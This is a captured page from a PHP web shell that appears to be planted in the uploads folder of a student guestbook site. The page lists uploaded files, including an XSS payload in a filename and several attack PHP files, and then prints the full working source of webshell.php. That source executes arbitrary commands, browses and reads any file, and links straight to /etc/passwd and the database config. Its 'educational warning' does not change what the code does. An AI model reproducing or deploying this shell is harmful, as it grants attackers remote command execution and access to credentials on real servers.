🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./webshell.php

<?php
// Advanced PHP shell for demonstration
echo "<h1 style='background: black; color: lime; padding: 10px;'>🐚 WEB SHELL ACTIVATED</h1>";

if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    echo "<h2>Executing: " . htmlspecialchars($cmd) . "</h2>";
    echo "<pre style='background: #000; color: #0f0; padding: 10px; border-radius: 5px;'>";
    
    // Try different command execution methods
    if (function_exists('system')) {
        system($cmd);
    } elseif (function_exists('exec')) {
        exec($cmd, $output);
        echo implode("\n", $output);
    } elseif (function_exists('shell_exec')) {
        echo shell_exec($cmd);
    } elseif (function_exists('passthru')) {
        passthru($cmd);
    } else {
        echo "No command execution functions available.";
    }
    echo "</pre>";
}

// File browser
echo "<h2>📁 File Browser</h2>";
$dir = isset($_GET['dir']) ? $_GET['dir'] : '.';
$files = scandir($dir);

echo "<p>Current directory: <code>" . realpath($dir) . "</code></p>";
echo "<div style='background: #f5f5f5; padding: 10px; border-radius: 5px;'>";

foreach ($files as $file) {
    if ($file === '.') continue;
    $fullPath = $dir . '/' . $file;
    
    if (is_dir($fullPath)) {
        echo "📁 <a href='?dir=" . urlencode($fullPath) . "'>" . htmlspecialchars($file) . "</a><br>";
    } else {
        echo "📄 " . htmlspecialchars($file);
        if (is_readable($fullPath)) {
            echo " <a href='?view=" . urlencode($fullPath) . "'>[view]</a>";
        }
        echo "<br>";
    }
}
echo "</div>";

// File viewer
if (isset($_GET['view'])) {
    $file = $_GET['view'];
    if (is_readable($file)) {
        echo "<h2>📄 Viewing: " . htmlspecialchars($file) . "</h2>";
        echo "<pre style='background: #f9f9f9; padding: 10px; border: 1px solid #ddd; max-height: 400px; overflow: auto;'>";
        echo htmlspecialchars(file_get_contents($file));
        echo "</pre>";
    }
}
?>

<h2>🎯 Available Actions</h2>
<div style="background: #e9ecef; padding: 15px; border-radius: 8px;">
    <h3>Command Execution:</h3>
    <form>
        <input type="text" name="cmd" placeholder="Enter command (e.g., ls, whoami, pwd)" style="width: 300px; padding: 5px;">
        <button type="submit">Execute</button>
    </form>
    
    <h3>Quick Commands:</h3>
    <a href="?cmd=ls -la">📋 List files</a> | 
    <a href="?cmd=whoami">👤 Show user</a> | 
    <a href="?cmd=pwd">📍 Show directory</a> | 
    <a href="?cmd=ps aux">🔄 Show processes</a> | 
    <a href="?cmd=cat /etc/passwd">🔐 Show users</a>
    
    <h3>File Operations:</h3>
    <a href="?dir=..">⬆️ Parent directory</a> | 
    <a href="?dir=/">🏠 Root directory</a> | 
    <a href="?view=../config/Database.php">🔍 View DB config</a>
</div>

<div style="margin-top: 20px; padding: 10px; background: #fff3cd; border-radius: 5px;">
    <strong>⚠️ Educational Warning:</strong> This demonstrates a web shell vulnerability. 
    In a real attack, this could allow complete server compromise!
</div>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!